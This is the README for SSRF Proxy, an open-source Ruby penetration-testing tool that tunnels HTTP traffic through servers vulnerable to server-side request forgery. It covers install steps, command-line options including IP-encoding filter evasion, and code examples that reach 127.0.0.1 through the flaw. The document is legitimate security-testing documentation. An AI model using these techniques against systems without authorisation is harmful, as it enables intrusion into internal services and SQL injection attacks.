SSRF Proxy
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to HTTP Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers and scanning tools such as sqlmap and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
| Version | 0.0.3 |
|---|---|
| Github | https://github.com/bcoles/ssrf_proxy |
| Wiki | https://github.com/bcoles/ssrf_proxy/wiki |
| Documentation | http://www.rubydoc.info/github/bcoles/ssrf_proxy |
| Author | Brendan Coles |
| Copyright | 2015-2016 Brendan Coles |
| License | MIT - (see LICENSE.md file) |
Requirements
Ruby 1.9.3 or newer
Ruby Gems:
- celluloid-io
- webrick
- logger
- colorize
- ipaddress
- base32
- htmlentities
- socksify
Installation
$ gem install ssrf_proxy
Usage (command line)
Usage: ssrf-proxy [options] -u <SSRF URL>
Example: ssrf-proxy -u http://target/?url=xxURLxx
Options:
-h, --help Help
-v, --verbose Verbose output
-d, --debug Debugging output
Server options:
-p, --port=PORT Listen port (Default: 8081)
--interface=IP Listen interface (Default: 127.0.0.1)
SSRF request options:
-u, --url=URL SSRF URL with 'xxURLxx' placeholder
--method=METHOD HTTP method (GET/HEAD/DELETE/POST/PUT)
(Default: GET)
--post-data=DATA HTTP post data
--cookie=COOKIE HTTP cookies (separated by ';')
--user-agent=AGENT HTTP user-agent (Default: Mozilla/5.0)
--rules=RULES Rules for parsing client request for xxURLxx
(separated by ',') (Default: none)
SSRF connection options:
--proxy=PROXY Use a proxy to connect to the server.
(Supported proxies: http, https, socks)
--insecure Skip server SSL certificate validation.
--timeout=SECONDS Connection timeout in seconds (Default: 10)
HTTP response modification:
--match=REGEX Regex to match response body content.
(Default: \A(.*)\z)
--strip=HEADERS Headers to remove from the response.
(separated by ',') (Default: none)
--decode-html Decode HTML entities in response body.
--guess-status Replaces response status code and message
headers (determined by common strings in the
response body, such as 404 Not Found.)
--guess-mime Replaces response content-type header with the
appropriate mime type (determined by the file
extension of the requested resource.)
--ask-password Prompt for password on authentication failure.
Adds a 'WWW-Authenticate' HTTP header to the
response if the response code is 401.
Client request modification:
--forward-cookies Forward client HTTP cookies through proxy to
SSRF server.
--cookies-to-uri Add client request cookies to URI query.
--body-to-uri Add client request body to URI query.
--auth-to-uri Use client request basic authentication
credentials in request URI.
--ip-encoding=MODE Encode client request host IP address.
(Modes: int, ipv6, oct, hex, dotted_hex)
Usage (ruby)
First, create a new SSRFProxy::HTTP object:
# SSRF URL with 'xxURLxx' placeholder
url = 'http://example.local/index.php?url=xxURLxx'
# options
opts = {
'proxy' => '',
'method' => 'GET',
'post_data' => '',
'rules' => '',
'ip_encoding' => '',
'match' => "\\A(.+)\\z",
'strip' => '',
'decode_html' => false,
'guess_mime' => false,
'guess_status' => false,
'ask_password' => false,
'forward_cookies'=> false,
'body_to_uri' => false,
'auth_to_uri' => false,
'cookies_to_uri' => false,
'cookie' => '',
'timeout' => 10,
'user_agent' => 'Mozilla/5.0',
'insecure' => false
}
# create SSRFProxy::HTTP object
ssrf = SSRFProxy::HTTP.new(url, opts)
# set log level (optional)
ssrf.logger.level = Logger::DEBUG
Then send HTTP requests via the SSRF:
# fetch http://127.0.0.1/ via SSRF by String
uri = 'http://127.0.0.1/'
ssrf.send_uri(uri)
# fetch http://127.0.0.1/ via SSRF by URI
uri = URI.parse('http://127.0.0.1/')
ssrf.send_uri(uri)
# fetch http://127.0.0.1/ via SSRF using a raw HTTP request
http = "GET http://127.0.0.1/ HTTP/1.1\n\n"
ssrf.send_request(http)
Documentation
Refer to the wiki for more information and example usage: https://github.com/bcoles/ssrf_proxy/wiki
Refer to RubyDoc for code documentation: http://www.rubydoc.info/github/bcoles/ssrf_proxy